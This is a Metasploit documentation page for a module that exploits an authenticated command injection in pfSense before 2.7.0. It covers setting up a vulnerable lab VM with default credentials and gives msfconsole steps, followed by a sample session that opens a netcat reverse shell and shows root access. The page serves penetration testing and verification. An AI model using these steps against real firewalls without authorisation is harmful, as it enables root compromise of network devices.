adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
6d9d9a70d410cc94de4d3d9afd7a75cd426d43be
metasploit-gs/documentation/modules/exploit/unix/http/pfsense_config_data_exec.md
T
cgranleese-r7 469f102596 Updates docs to reflect new default prompt
2025-07-17 09:53:40 +01:00

2.6 KiB
Raw Blame History

Vulnerable Application

This module exploits an authenticated command injection vulnerability in the restore_rrddata() function of pfSense prior to 2.7.0 which allows an authenticated attacker with the WebCfg - Diagnostics: Backup & Restore privilege to execute arbitrary operating system commands as the root user.

This module has been tested successfully on version 2.6.0-RELEASE.

Installing the Application

Download the ISO from pfSense 2.6.0-RELEASE and then create a VMWare or VirtualBox VM using this ISO.

Note that you may wish to use the BIOS boot method when prompted for which method to use for installation, rather than ZFS or UEFI for testing purposes, just to simplify setup. Otherwise you can accept the default settings.

Once installation is finished you should be prompted to reboot. Reboot, then enter n when asked if you want to set up VLANs.

For the WAN prompt enter em0 which should work, or whatever one other than a that appears in the prompt and hit ENTER.

Wait for setup to complete then try to browse to http://<IP ADDRESS SHOWN HERE>/ replacing the placeholder with the IP address shown in the prompt. You should see the login page for pfSense.

Log in with username admin and password pfsense. There should be a setup GUI that appears. Accept all the defaults and keep clicking Next at each of the steps and then Finish at the final step. Finally click Accept on the export warning page and Close on the following popup. You should now see the main dashboard and should be ready to test the module.

Verification Steps

  1. Start msfconsole
  2. Do: use exploit/unix/http/pfsense_config_data_exec
  3. Do: set RHOST [IP]
  4. Do: set USERNAME [username]
  5. Do: set PASSWORD [password]
  6. Do: set LHOST [IP]
  7. Do: exploit

Options

Scenarios

pfSense Community Edition 2.6.0-RELEASE

msf exploit(unix/http/pfsense_config_data_exec) > use exploit/unix/http/pfsense_config_data_exec 
[*] Using configured payload cmd/unix/reverse_netcat
msf exploit(unix/http/pfsense_config_data_exec) > set RHOST 1.1.1.1
RHOST => 1.1.1.1
msf exploit(unix/http/pfsense_config_data_exec) > set LHOST 2.2.2.2
LHOST => 2.2.2.2
msf exploit(unix/http/pfsense_config_data_exec) > exploit

[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] pfSense version: 2.6.0-RELEASE
[+] The target is vulnerable.
[*] Command shell session 1 opened (2.2.2.2:4444 -> 1.1.1.1:21942) at 2023-03-26 02:10:48 +0300

id
uid=0(root) gid=0(wheel) groups=0(wheel)
whoami
root
Reference in New Issue View Git Blame Copy Permalink